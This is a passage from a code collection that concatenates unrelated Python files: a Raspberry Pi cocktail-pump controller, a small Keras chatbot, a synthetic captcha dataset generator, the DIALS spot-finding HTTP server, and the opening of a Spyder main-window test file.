        return (int(255 - pos * 3), 0, int(pos * 3))
    # Green rises, blue falls.
    pos -= 170
    return (0, int(pos * 3), int(255 - pos * 3))
def rainbow_cycle(wait):
    """Advance the whole strip once around the colour wheel, pausing
    `wait` seconds between frames."""
    for step in range(255):
        for idx in range(num_pixels):
            # Spread the wheel across the strip, offset by the current step.
            pixels[idx] = wheel(((idx * 256 // num_pixels) + step) & 255)
        pixels.show()
        time.sleep(wait)
class Bartender(MenuDelegate):
    """Drink-mixing controller.

    Drives the OLED menu, the pump relays and the NeoPixel strip, and
    reacts to the two hardware buttons via GPIO edge interrupts.
    """

    def __init__(self):
        # True while a pour/clean is in progress; button presses are ignored.
        self.running = False

        # OLED screen dimensions.
        self.screen_width = SCREEN_WIDTH
        self.screen_height = SCREEN_HEIGHT

        self.btn1Pin = LEFT_BTN_PIN
        self.btn2Pin = RIGHT_BTN_PIN

        # Configure button inputs with internal pull-ups (buttons pull low).
        GPIO.setup(self.btn1Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)
        GPIO.setup(self.btn2Pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)

        # Configure the SPI-attached SSD1306 screen.
        spi_bus = 0
        spi_device = 0
        gpio = gaugette.gpio.GPIO()
        spi = gaugette.spi.SPI(spi_bus, spi_device)

        # Very important... This lets py-gaugette 'know' what pins to use in
        # order to reset the display.  Change rows & cols depending on your
        # display dimensions.
        self.led = gaugette.ssd1306.SSD1306(gpio, spi, reset_pin=OLED_RESET_PIN, dc_pin=OLED_DC_PIN, rows=self.screen_height, cols=self.screen_width)
        self.led.begin()
        self.led.clear_display()
        self.led.display()
        # Quick invert/restore flash as a visible power-on self test.
        self.led.invert_display()
        time.sleep(0.5)
        self.led.normal_display()
        time.sleep(0.5)

        # Load the pump configuration from file.
        self.pump_configuration = Bartender.readPumpConfiguration()
        for pump in self.pump_configuration.keys():
            # Pumps are active-low: HIGH keeps the relay off at startup.
            GPIO.setup(self.pump_configuration[pump]["pin"], GPIO.OUT, initial=GPIO.HIGH)

        # Idle lighting: warm gold.
        pixels.fill((255, 100, 9))
        pixels.show()

        print("Done initializing")

    @staticmethod
    def readPumpConfiguration():
        """Load the pump -> {name, pin, value} mapping from pump_config.json."""
        # BUG FIX: json.load(open(...)) leaked the file handle.
        with open('pump_config.json') as jsonFile:
            return json.load(jsonFile)

    @staticmethod
    def writePumpConfiguration(configuration):
        """Persist the pump configuration back to pump_config.json."""
        with open("pump_config.json", "w") as jsonFile:
            json.dump(configuration, jsonFile)

    def startInterrupts(self):
        """Attach falling-edge callbacks for both buttons."""
        GPIO.add_event_detect(self.btn1Pin, GPIO.FALLING, callback=self.left_btn, bouncetime=LEFT_PIN_BOUNCE)
        GPIO.add_event_detect(self.btn2Pin, GPIO.FALLING, callback=self.right_btn, bouncetime=RIGHT_PIN_BOUNCE)

    def stopInterrupts(self):
        """Detach the button edge callbacks."""
        GPIO.remove_event_detect(self.btn1Pin)
        GPIO.remove_event_detect(self.btn2Pin)

    def atExit(self):
        """Turn the lights off, release GPIO and terminate the process."""
        pixels.fill((0, 0, 0))
        # BUG FIX: was `pixels.show` (attribute access, method never called).
        pixels.show()
        GPIO.cleanup()
        sys.exit(0)

    def buildMenu(self, drink_list, drink_options):
        """Build the menu tree: drinks at the top level, then a Configure
        submenu with per-pump fluid selection and a Clean action."""
        m = Menu("Main Menu")

        # Add drink options.
        drink_opts = [
            MenuItem('drink', d["name"], {"ingredients": d["ingredients"]})
            for d in drink_list
        ]

        configuration_menu = Menu("Configure")

        # Add pump configuration options.
        pump_opts = []
        for p in sorted(self.pump_configuration.keys()):
            config = Menu(self.pump_configuration[p]["name"])
            # Add fluid options for each pump.  The selection star is applied
            # later by selectConfigurations(), not here.
            for opt in drink_options:
                config.addOption(MenuItem('pump_selection', opt["name"], {"key": p, "value": opt["value"], "name": opt["name"]}))
            # Add a back button so the user can return without modifying.
            config.addOption(Back("Back"))
            config.setParent(configuration_menu)
            pump_opts.append(config)

        # Add pump menus to the configuration menu.
        configuration_menu.addOptions(pump_opts)
        # Add a back button to the configuration menu.
        configuration_menu.addOption(Back("Back"))
        # Adds an option that cleans all pumps to the configuration menu.
        configuration_menu.addOption(MenuItem('clean', 'Clean'))
        configuration_menu.setParent(m)

        m.addOptions(drink_opts)
        m.addOption(configuration_menu)

        # Create a menu context.
        self.menuContext = MenuContext(m, self)

    def filterDrinks(self, menu):
        """
        Removes any drinks that can't be handled by the pump configuration
        """
        for item in menu.options:
            if item.type == "drink":
                item.visible = False
                ingredients = item.attributes["ingredients"]
                presentIng = 0
                for ing in ingredients.keys():
                    for p in self.pump_configuration.keys():
                        if ing == self.pump_configuration[p]["value"]:
                            presentIng += 1
                # Visible only when every ingredient has a matching pump.
                if presentIng == len(ingredients.keys()):
                    item.visible = True
            elif item.type == "menu":
                self.filterDrinks(item)

    def selectConfigurations(self, menu):
        """
        Adds a selection star to the pump configuration option
        """
        for item in menu.options:
            if item.type == "pump_selection":
                key = item.attributes["key"]
                if self.pump_configuration[key]["value"] == item.attributes["value"]:
                    item.name = "%s %s" % (item.attributes["name"], "*")
                else:
                    item.name = item.attributes["name"]
            elif item.type == "menu":
                self.selectConfigurations(item)

    def prepareForRender(self, menu):
        """MenuDelegate hook: refresh drink visibility and selection stars."""
        self.filterDrinks(menu)
        self.selectConfigurations(menu)
        return True

    def menuItemClicked(self, menuItem):
        """MenuDelegate callback: dispatch a selected menu item.

        Returns True when the click was handled.
        """
        if menuItem.type == "drink":
            self.makeDrink(menuItem.name, menuItem.attributes["ingredients"])
            return True
        elif menuItem.type == "pump_selection":
            self.pump_configuration[menuItem.attributes["key"]]["value"] = menuItem.attributes["value"]
            Bartender.writePumpConfiguration(self.pump_configuration)
            return True
        elif menuItem.type == "clean":
            self.clean()
            return True
        return False

    def _runPumps(self, pumpThreads, duration):
        """Start all pump threads, animate the progress bar for `duration`
        seconds, then wait for every pump to finish."""
        for thread in pumpThreads:
            thread.start()
        self.progressBar(duration)
        for thread in pumpThreads:
            thread.join()

    def clean(self):
        """Run every pump simultaneously for a fixed time to flush the lines."""
        waitTime = 20

        # Ignore button presses while cleaning is in progress.
        self.running = True

        pumpThreads = [
            threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
            for pump in self.pump_configuration.keys()
        ]
        self._runPumps(pumpThreads, waitTime)

        # Show the main menu.
        self.menuContext.showMenu()

        # Sleep for a couple seconds to make sure the interrupts don't get
        # triggered.
        time.sleep(2)
        self.running = False

    def displayMenuItem(self, menuItem):
        """Render the given menu item on the OLED and mirror it to the
        module-level screenItem cache."""
        global screenItem
        screenItem = menuItem
        print(menuItem.name)
        self.led.clear_display()
        self.led.draw_text2(0, 20, menuItem.name, 2)
        self.led.display()

    def cycleLights(self):
        """Animate the strip until the owning thread clears our `do_run`
        attribute (see makeDrink)."""
        t = threading.current_thread()
        while getattr(t, "do_run", True):
            rainbow_cycle(0.001)

    def lightsEndingSequence(self):
        """Celebration after a pour: green sweep on, sweep off, then fade
        the strip back up to the idle gold colour."""
        pixels.fill((0, 0, 0))
        pixels.show()
        # Make lights green, one pixel at a time.
        for i in range(num_pixels):
            pixels[i] = (0, 255, 15)
            pixels.show()
            time.sleep(0.03)
        # Then sweep them back off.
        for i in range(num_pixels):
            pixels[i] = (0, 0, 0)
            pixels.show()
            time.sleep(0.03)
        # Fade back up to the idle gold colour.
        for i in range(0, 101):
            pixels.fill((int(255 * (i / 100)), int(100 * (i / 100)), int(9 * (i / 100))))
            time.sleep(0.01)
            pixels.show()

    def pour(self, pin, waitTime):
        """Energize one pump (active-low relay) for waitTime seconds."""
        GPIO.output(pin, GPIO.LOW)
        time.sleep(waitTime)
        GPIO.output(pin, GPIO.HIGH)

    def progressBar(self, waitTime):
        """Animate the on-screen progress bar from 0 to 100% over
        waitTime seconds."""
        interval = waitTime / 100.0
        for x in range(1, 101):
            self.led.clear_display()
            self.updateProgressBar(x, y=35)
            self.led.display()
            time.sleep(interval)

    def makeDrink(self, drink, ingredients):
        """Pour a drink: run the pump for each available ingredient for a
        time proportional to its amount, with lights and a progress bar."""
        # Ignore button presses while the drink is being made.
        self.running = True

        # Lighting runs on its own thread until we clear its do_run flag.
        lightsThread = threading.Thread(target=self.cycleLights)
        lightsThread.start()

        # Parse the drink ingredients and spawn one thread per matching pump.
        maxTime = 0
        pumpThreads = []
        for ing in ingredients.keys():
            for pump in self.pump_configuration.keys():
                if ing == self.pump_configuration[pump]["value"]:
                    waitTime = ingredients[ing] * FLOW_RATE
                    maxTime = max(maxTime, waitTime)
                    pump_t = threading.Thread(target=self.pour, args=(self.pump_configuration[pump]["pin"], waitTime))
                    pumpThreads.append(pump_t)

        self._runPumps(pumpThreads, maxTime)

        # Show the main menu.
        self.menuContext.showMenu()

        # Stop the light thread.
        lightsThread.do_run = False
        lightsThread.join()

        # Show the ending sequence lights.
        self.lightsEndingSequence()

        # Sleep for a couple seconds to make sure the interrupts don't get
        # triggered.
        time.sleep(2)
        self.running = False

    def left_btn(self, ctx):
        """Left button: advance to the next menu entry (ignored mid-pour)."""
        if not self.running:
            self.menuContext.advance()

    def right_btn(self, ctx):
        """Right button: select the current menu entry (ignored mid-pour)."""
        if not self.running:
            self.menuContext.select()

    def updateProgressBar(self, percent, x=15, y=15):
        """Draw a bordered progress bar and fill it to `percent` (0-100)."""
        height = 10
        width = self.screen_width - 2 * x
        # Top and bottom edges.
        for w in range(0, width):
            self.led.draw_pixel(w + x, y)
            self.led.draw_pixel(w + x, y + height)
        # Left/right edges, plus the proportional fill on every row
        # (fill nested inside the row loop, as in the upstream project).
        for h in range(0, height):
            self.led.draw_pixel(x, h + y)
            self.led.draw_pixel(self.screen_width - x, h + y)
            for p in range(0, percent):
                p_loc = int(p / 100.0 * width)
                self.led.draw_pixel(x + p_loc, h + y)
# Entry point: construct the bartender and build its menu tree from the
# static drink definitions.  (The interrupt-driven main loop is disabled.)
bartender = Bartender()
bartender.buildMenu(drink_list, drink_options)
#bartender.run()
|
main2.py | # encoding: utf-8
#这里放置主程序以及IO
from numpy import *
from utils.tools import loadvoc
from keras.models import Sequential,load_model,Model
from keras.layers import Input, Reshape,Embedding, LSTM, Dense, merge, RepeatVector,TimeDistributed,Masking,Activation
from keras.optimizers import SGD,Adam
from keras.utils.np_utils import to_categorical
import threading
import time
import os
rlock = threading.RLock()

# Character codec: map each supported character to a 1-based integer id
# (0 is reserved for padding/unknown) and back.
#i2c, c2i = loadvoc()
ss="qwertyuiopasdfghjkl'zxcvbnm,.-?! "
i2c={}
c2i={}
for i in range(len(ss)):
    i2c[i+1]=ss[i]
    c2i[ss[i]]=i+1

# Model parameters.
VOC = len(i2c)  # maximum vocabulary size
SEN = 100  # maximum sentence length (characters)
M = 20  # short-term memory size (number of remembered sentences)
INPUT=['' for x in range(M)]  # buffer of recent input sentences
SPEAK_OUTPUT=''  # buffer holding the generated reply
def store(s, M):
    """Prepend sentence `s` to memory list `M`, dropping the oldest entry.

    As a cheap dedupe, `M` is returned unchanged when `s` already equals
    both of the two most recent entries.
    """
    if s == M[0] and s == M[1]:
        return M
    return [s] + M[:-1]
def get(M):
    """Split memory `M` into (inputs, targets).

    Entries are newest-first; odd-indexed entries become the inputs and
    even-indexed entries the targets, truncated to an even length.
    """
    usable = len(M) - len(M) % 2
    MX = [M[i + 1] for i in range(0, usable, 2)]
    MY = [M[i] for i in range(0, usable, 2)]
    return MX, MY
# Convert sentences to integer index arrays.
def s2i(S, SEN=SEN):
    """Encode a list of sentences into an (N, SEN, 1) int32 array,
    using 0 for characters outside the vocabulary and for padding."""
    N = len(S)
    idx = zeros([N, SEN, 1], dtype=int32)
    for n, sentence in enumerate(S):
        for pos in range(min(SEN, len(sentence))):
            idx[n, pos, 0] = c2i.get(sentence[pos], 0)
    return idx
def i2s(idx):
    """Decode an (N, SEN, 1) index array back into a list of strings,
    rounding values to ids and skipping non-positive (padding) entries."""
    S = []
    for row in idx:
        chars = [
            i2c.get(int(round(v)), '')
            for v in row[:, 0]
            if v > 0
        ]
        S.append(''.join(chars))
    return S
# Define the main model: two stacked LSTMs reading the (SEN, 1) character
# index sequence, a dense layer producing one value per position, reshaped
# back to (SEN, 1) with a linear output.
model = Sequential()
model.add(LSTM(input_dim=1, output_dim=64, return_sequences=True))
model.add(LSTM(128, return_sequences=False))
model.add(Dense(output_dim=SEN))
model.add(Reshape((SEN,1)))
model.add(Activation('linear'))
print('compiling...')
model.compile(loss='mse', optimizer='rmsprop')
print('compiled')
# Model training -- loop control flags shared between the two threads.
POWER_OFF = False  # set truthy by say() to stop both loops
SPEAK = False  # set by say() to request that run() prints a reply

def run():
    """Background training loop: continually refit the model on paired
    (input, reply) sentences from memory and cache a predicted reply."""
    global INPUT, SPEAK_OUTPUT, POWER_OFF, SPEAK
    while not POWER_OFF:
        # Read the memory buffer and train on (previous, reply) pairs.
        X, Y = get(INPUT)
        X = s2i(X)
        Y = s2i(Y)
        model.fit(X, Y,
                  nb_epoch=1, batch_size=len(X), verbose=0)
        # Predict a reply to the most recent input sentence.
        yy = model.predict(X[0:1], verbose=0)
        SPEAK_OUTPUT = i2s(yy)  # list of decoded strings
        if SPEAK:
            print('\nA: '+SPEAK_OUTPUT[0]+'\n')
            SPEAK = False
        time.sleep(0.5)
def say():
    """Console I/O loop: read user input, store it in memory and request a
    reply; typing 'end' shuts everything down and saves the model."""
    global INPUT, SPEAK_OUTPUT, POWER_OFF, SPEAK
    while not POWER_OFF:
        if not SPEAK:
            # NOTE(review): raw_input implies Python 2 -- confirm runtime
            # before porting (Python 3 would need input()).
            a = raw_input('Q: ').lower()
            if a == u'end':
                POWER_OFF = a  # any truthy value stops both loops
                model.save('baby-model.h5')
            else:
                SPEAK = True
                INPUT = store(a, INPUT)
# Launch the trainer and console loops concurrently.
threading.Thread(target = run, args = (), name = 'run').start()
threading.Thread(target = say, args = (), name = 'say').start()
|
generate_dataset.py | """
**********************************************************************
**********************************************************************
** author: ZSAIm
** email: zzsaim@163.com
** github: https://github.com/ZSAIm/CNN-Get-Captcha
**
** programming by python 3.5
**
** 9.9-2018
**********************************************************************
**********************************************************************
"""
import random
from wheezy.captcha.image import captcha, background, noise, rotate, text, curve, warp, offset, smooth
from constant import *
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import img_process
from io import BytesIO
import threading
import os
import time
# Font used to render the captcha text.
FONT_PATH = 'arialbd.ttf'
# Base greyscale binarization threshold (jittered per image in generate_image).
THRESHOLD = 170
# Dataset layout: NUM_SHARDS TFRecord files, INSTANCES_PER_SHARD images each.
NUM_SHARDS = 5
INSTANCES_PER_SHARD = 10000

# Progress counter shared by the writer threads, guarded by count_lock.
global_count = 0
count_lock = threading.Lock()
def random_chars(num):
    """Return a random string of `num` characters drawn from CHAR_SET."""
    last = len(CHAR_SET) - 1
    return ''.join(CHAR_SET[random.randint(0, last)] for _ in range(num))
def generate_image(num):
    """Render one captcha with `num` random characters.

    Returns (jpeg_bytes, label) where label is the ground-truth string.
    """
    # Drawing pipeline: plain white background with rotated/offset text only
    # (the imported noise/curve/warp distortions are deliberately unused).
    captcha_model = captcha(width=IMAGE_WIDTH, height=IMAGE_HEIGHT, drawings=[
        background(color='#FFFFFF'),
        text(font_sizes=[19, 20, 21, 22],
             fonts=[FONT_PATH],
             drawings=[
                 rotate(angle=15),
                 offset(0.10, 0.10)
             ],
             start_x=0,
             start_y=0,
             squeeze_factor=0.88),
    ])
    label = random_chars(num)
    imgsrc = captcha_model(label)
    image = imgsrc.convert('L')  # to greyscale
    imgpx = image.load()
    # Binarize with a randomly jittered threshold, then despeckle.
    img_process.binary(image, imgpx, THRESHOLD + random.randint(-20, 15))
    img_process.clear_noise(image, imgpx)
    # Serialize to JPEG in memory rather than on disk.
    fp = BytesIO()
    image.save(fp, 'JPEG')
    return fp.getvalue(), label
def batch_dump():
    """Spawn one image_dump worker thread per shard, throttled so at most
    `max_thread` workers run concurrently; prints rough progress."""
    threads = []
    max_thread = 20
    for shard in range(NUM_SHARDS):
        while True:
            # Drop finished workers.  BUG FIX: Thread.is_alive() replaces the
            # camelCase isAlive(), which was removed in Python 3.9.
            threads = [t for t in threads if t.is_alive()]
            time.sleep(0.2)
            # Rough progress indicator (unsynchronized read is fine here).
            if global_count % 1000 == 0:
                print(global_count)
            if len(threads) < max_thread:
                break
        thd = threading.Thread(target=image_dump, args=(shard,))
        threads.append(thd)
        thd.start()
def image_dump(index_shard):
    """Write one TFRecord shard containing INSTANCES_PER_SHARD labelled
    captcha images."""
    global global_count, count_lock
    tf_writer = tf.python_io.TFRecordWriter(os.path.join(DATA_SET_PATH,
                                                         TFRECORD_NAME % (index_shard, NUM_SHARDS)))
    for i in range(INSTANCES_PER_SHARD):
        raw_img, label_str = generate_image(4)
        # Pack the 4-character label into a single integer, base
        # len(CHAR_SET), least-significant character first.
        int_label = 0
        for j, k in enumerate(label_str):
            int_label += CHAR_SET.index(k) * (len(CHAR_SET) ** j)
        example = tf.train.Example(features=tf.train.Features(
            feature={
                'int_label': tf.train.Feature(int64_list=tf.train.Int64List(value=[int_label])),
                'raw_image': tf.train.Feature(bytes_list=tf.train.BytesList(value=[raw_img])),
            }))
        tf_writer.write(example.SerializeToString())
        # Shared progress counter read by batch_dump.
        with count_lock:
            global_count += 1
    tf_writer.close()
# Script entry point: generate all shards.
if __name__ == '__main__':
    batch_dump()
|
find_spots_server.py | from __future__ import absolute_import, division, print_function
from future import standard_library
standard_library.install_aliases()
import http.server as server_base
import json
import logging
import sys
import time
import urllib.parse
from multiprocessing import Process
import libtbx.phil
from dials.util import Sorry
logger = logging.getLogger("dials.command_line.find_spots_server")
help_message = """\
A client/server version of dials.find_spots with additional analysis including
estimation of resolution limits. Intended for quick feedback of image quality
during grid scans and data collections.
On the server machine::
dials.find_spots_server [nproc=8] [port=1234]
On the client machine::
dials.find_spots_client [host=hostname] [port=1234] [nproc=8] /path/to/image.cbf
The client will return a short xml string indicating the number of spots found
and several estimates of the resolution limit.
e.g.::
<response>
<image>/path/to/image_0001.cbf</image>
<spot_count>352</spot_count>
<spot_count_no_ice>263</spot_count_no_ice>
<d_min>1.46</d_min>
<d_min_method_1>1.92</d_min_method_1>
<d_min_method_2>1.68</d_min_method_2>
<total_intensity>56215</total_intensity>
</response>
* ``spot_count`` is the total number of spots found in given image
* ``spot_count_no_ice`` is the number of spots found excluding those at resolutions
where ice rings may be found
* ``d_min_method_1`` is equivalent to distl's resolution estimate method 1
* ``d_min_method_2`` is equivalent to distl's resolution estimate method 2
* ``total_intensity`` is the total intensity of all strong spots excluding those
at resolutions where ice rings may be found
Any valid ``dials.find_spots`` parameter may be passed to
``dials.find_spots_client``, e.g.::
dials.find_spots_client /path/to/image.cbf min_spot_size=2 d_min=2
To stop the server::
dials.find_spots_client stop [host=hostname] [port=1234]
"""
# Module-level shutdown flag -- presumably set when a client sends a stop
# request and checked by the server loop; confirm against the server code.
stop = False
def work(filename, cl=None):
    """Run spotfinding (and optionally indexing/integration) on one image.

    Parameters
    ----------
    filename : str
        Path to the image (or URL) to process.
    cl : list of str, optional
        Command-line style PHIL arguments forwarded from the client.

    Returns
    -------
    dict
        Per-image spotfinding statistics.  Depending on the requested
        steps and their outcome it may also contain ``lattices``,
        ``n_indexed``, ``fraction_indexed``, ``integrated_intensity``
        and/or ``error`` keys.
    """
    if cl is None:
        cl = []
    # Server-side options controlling the optional processing steps.
    phil_scope = libtbx.phil.parse(
        """\
ice_rings {
  filter = True
    .type = bool
  width = 0.004
    .type = float(value_min=0.0)
}
index = False
  .type = bool
integrate = False
  .type = bool
indexing_min_spots = 10
  .type = int(value_min=1)
"""
    )
    interp = phil_scope.command_line_argument_interpreter()
    params, unhandled = interp.process_and_fetch(
        cl, custom_processor="collect_remaining"
    )
    # Extract once instead of re-extracting the scope for every option.
    extracted = params.extract()
    filter_ice = extracted.ice_rings.filter
    ice_rings_width = extracted.ice_rings.width
    index = extracted.index
    integrate = extracted.integrate
    indexing_min_spots = extracted.indexing_min_spots

    from dxtbx.model.experiment_list import ExperimentListFactory
    from dials.array_family import flex
    from dials.command_line.find_spots import phil_scope as find_spots_phil_scope

    # Any arguments not consumed above are treated as spotfinding parameters.
    interp = find_spots_phil_scope.command_line_argument_interpreter()
    phil_scope, unhandled = interp.process_and_fetch(
        unhandled, custom_processor="collect_remaining"
    )
    logger.info("The following spotfinding parameters have been modified:")
    logger.info(find_spots_phil_scope.fetch_diff(source=phil_scope).as_str())
    params = phil_scope.extract()
    # no need to write the hot mask in the server/client
    params.spotfinder.write_hot_mask = False
    experiments = ExperimentListFactory.from_filenames([filename])
    t0 = time.time()
    reflections = flex.reflection_table.from_observations(experiments, params)
    t1 = time.time()
    logger.info("Spotfinding took %.2f seconds" % (t1 - t0))
    from dials.algorithms.spot_finding import per_image_analysis

    imageset = experiments.imagesets()[0]
    reflections.centroid_px_to_mm(experiments)
    reflections.map_centroids_to_reciprocal_space(experiments)
    stats = per_image_analysis.stats_for_reflection_table(
        reflections, filter_ice=filter_ice, ice_rings_width=ice_rings_width
    )._asdict()
    t2 = time.time()
    logger.info("Resolution analysis took %.2f seconds" % (t2 - t1))

    if index and stats["n_spots_no_ice"] > indexing_min_spots:
        logging.basicConfig(stream=sys.stdout, level=logging.INFO)
        from dials.algorithms.indexing import indexer
        from dials.command_line.index import phil_scope as index_phil_scope

        interp = index_phil_scope.command_line_argument_interpreter()
        phil_scope, unhandled = interp.process_and_fetch(
            unhandled, custom_processor="collect_remaining"
        )
        logger.info("The following indexing parameters have been modified:")
        index_phil_scope.fetch_diff(source=phil_scope).show()
        params = phil_scope.extract()

        # Treat a still shot recorded with a goniometer/scan as a still.
        if (
            imageset.get_goniometer() is not None
            and imageset.get_scan() is not None
            and imageset.get_scan().is_still()
        ):
            imageset.set_goniometer(None)
            imageset.set_scan(None)

        try:
            idxr = indexer.Indexer.from_parameters(
                reflections, experiments, params=params
            )
            indexing_results = []
            idxr.index()
            indexed_sel = idxr.refined_reflections.get_flags(
                idxr.refined_reflections.flags.indexed
            )
            indexed_sel &= ~(
                idxr.refined_reflections.get_flags(
                    idxr.refined_reflections.flags.centroid_outlier
                )
            )
            for i_expt, expt in enumerate(idxr.refined_experiments):
                sel = idxr.refined_reflections["id"] == i_expt
                sel &= indexed_sel
                indexing_results.append(
                    {
                        "crystal": expt.crystal.to_dict(),
                        "n_indexed": sel.count(True),
                        "fraction_indexed": sel.count(True) / sel.size(),
                    }
                )
            stats["lattices"] = indexing_results
            stats["n_indexed"] = indexed_sel.count(True)
            stats["fraction_indexed"] = indexed_sel.count(True) / len(reflections)
        except Exception as e:
            logger.error(e)
            stats["error"] = str(e)
        finally:
            t3 = time.time()
            logger.info("Indexing took %.2f seconds" % (t3 - t2))

        # Integration requires a successfully indexed lattice.
        if integrate and "lattices" in stats:
            from dials.algorithms.integration.integrator import create_integrator
            from dials.algorithms.profile_model.factory import ProfileModelFactory
            from dials.command_line.integrate import phil_scope as integrate_phil_scope

            interp = integrate_phil_scope.command_line_argument_interpreter()
            phil_scope, unhandled = interp.process_and_fetch(
                unhandled, custom_processor="collect_remaining"
            )
            # Fixed: informational output, not an error (matches the
            # spotfinding and indexing sections above).
            logger.info("The following integration parameters have been modified:")
            integrate_phil_scope.fetch_diff(source=phil_scope).show()
            params = phil_scope.extract()

            try:
                params.profile.gaussian_rs.min_spots = 0
                experiments = idxr.refined_experiments
                reference = idxr.refined_reflections
                predicted = flex.reflection_table.from_predictions_multi(
                    experiments,
                    dmin=params.prediction.d_min,
                    dmax=params.prediction.d_max,
                    margin=params.prediction.margin,
                    force_static=params.prediction.force_static,
                )
                matched, reference, unmatched = predicted.match_with_reference(
                    reference
                )
                assert len(matched) == len(predicted)
                assert matched.count(True) <= len(reference)
                if matched.count(True) == 0:
                    raise Sorry(
                        """
Invalid input for reference reflections.
Zero reference spots were matched to predictions
"""
                    )
                elif matched.count(True) != len(reference):
                    logger.info("")
                    logger.info("*" * 80)
                    logger.info(
                        "Warning: %d reference spots were not matched to predictions"
                        % (len(reference) - matched.count(True))
                    )
                    logger.info("*" * 80)
                    logger.info("")

                # Compute the profile model
                experiments = ProfileModelFactory.create(params, experiments, reference)

                # Compute the bounding box
                predicted.compute_bbox(experiments)

                # Create the integrator
                integrator = create_integrator(params, experiments, predicted)

                # Integrate the reflections
                reflections = integrator.integrate()

                stats["integrated_intensity"] = flex.sum(
                    reflections["intensity.sum.value"]
                )
            except Exception as e:
                logger.error(e)
                stats["error"] = str(e)
            finally:
                t4 = time.time()
                logger.info("Integration took %.2f seconds" % (t4 - t3))
    return stats
class handler(server_base.BaseHTTPRequestHandler):
    # NOTE: ``s`` is this project's conventional name for ``self``.
    def do_GET(s):
        """Respond to a GET request.

        The request path encodes the image filename plus optional
        ';'-separated PHIL parameters; the special path "/Ctrl-C" asks
        the server to shut down.  The response body is a JSON dict with
        the per-image stats (or an "error" key on failure).
        """
        s.send_response(200)
        s.send_header("Content-type", "text/xml")
        s.end_headers()
        if s.path == "/Ctrl-C":
            # Flip the module-level flag; serve() stops polling requests.
            global stop
            stop = True
            return
        filename = s.path.split(";")[0]
        params = s.path.split(";")[1:]
        # If we're passing a url through, then unquote and ignore leading /
        if "%3A//" in filename:
            filename = urllib.parse.unquote(filename[1:])
        d = {"image": filename}
        try:
            stats = work(filename, params)
            d.update(stats)
        except Exception as e:
            # Report processing failures to the client instead of crashing.
            d["error"] = str(e)
        response = json.dumps(d).encode("latin-1")
        s.wfile.write(response)
def serve(httpd):
    """Handle requests one at a time until the global ``stop`` flag is set.

    ``stop`` is toggled by the /Ctrl-C endpoint in ``handler.do_GET``;
    Ctrl-C at the terminal also exits cleanly.
    """
    try:
        while not stop:
            httpd.handle_request()
    except KeyboardInterrupt:
        pass
phil_scope = libtbx.phil.parse(
"""\
nproc = Auto
.type = int(value_min=1)
port = 1701
.type = int(value_min=1)
"""
)
def main(nproc, port):
    """Serve spotfinding requests on ``port`` using ``nproc`` processes.

    The listening socket is created once and shared with ``nproc - 1``
    forked worker processes (pre-fork style); the parent process serves
    requests as well, so ``nproc`` processes handle requests in total.
    """
    server_class = server_base.HTTPServer
    httpd = server_class(("", port), handler)
    print(time.asctime(), "Serving %d processes on port %d" % (nproc, port))
    for j in range(nproc - 1):
        # Daemon workers die automatically when the parent exits.
        proc = Process(target=serve, args=(httpd,))
        proc.daemon = True
        proc.start()
    serve(httpd)
    httpd.server_close()
    print(time.asctime(), "done")
if __name__ == "__main__":
    usage = "dials.find_spots_server [options]"
    from dials.util.options import OptionParser

    parser = OptionParser(usage=usage, phil=phil_scope, epilog=help_message)
    params, options = parser.parse_args(show_diff_phil=True)
    if params.nproc is libtbx.Auto:
        # Auto: use every available core (fall back to 1 process if the
        # count cannot be determined, since -1 - 1 workers == no forks).
        from libtbx.introspection import number_of_processors

        params.nproc = number_of_processors(return_value_if_unknown=-1)
    main(params.nproc, params.port)
|
test_mainwindow.py | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
import os
import os.path as osp
import re
import shutil
import sys
import tempfile
from textwrap import dedent
from unittest.mock import Mock, MagicMock
import uuid
# Third party imports
from flaky import flaky
import ipykernel
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pkg_resources
from pkg_resources import parse_version
import pylint
import pytest
from qtpy import PYQT5, PYQT_VERSION
from qtpy.QtCore import Qt, QTimer, QUrl
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit,
QTabBar, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__, __project_url__
from spyder.api.utils import get_class_values
from spyder.api.widgets.auxiliary_widgets import SpyderWindowWidget
from spyder.app import start
from spyder.app.mainwindow import MainWindow
from spyder.config.base import get_home_dir, get_conf_path, get_module_path
from spyder.config.manager import CONF
from spyder.plugins.base import PluginWindow
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.plugins.layout.layouts import DefaultLayouts
from spyder.plugins.projects.api import EmptyProject
from spyder.py3compat import PY2, to_text_string
from spyder.utils.misc import remove_backslashes
from spyder.widgets.dock import DockTitleBar
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))

# Time to wait until the IPython console is ready to receive input
# (in milliseconds); Windows CI machines are slower.
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000

# Need longer EVAL_TIMEOUT, because need to cythonize and C compile ".pyx" file
# before import and eval it
COMPILE_AND_EVAL_TIMEOUT = 30000

# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
    """Open *fname* through the Editor's currently shown open-file dialog.

    Scans the application's top-level widgets for a ``QFileDialog``,
    optionally points it at *directory*, types the filename into its
    first line edit and confirms with Enter.
    """
    for widget in QApplication.topLevelWidgets():
        if not isinstance(widget, QFileDialog):
            continue
        if directory is not None:
            widget.setDirectory(directory)
        name_edit = widget.findChildren(QLineEdit)[0]
        name_edit.setText(fname)
        QTest.keyClick(widget, Qt.Key_Enter)
def get_thirdparty_plugin(main_window, plugin_title):
    """Return the third-party plugin whose title matches, or None.

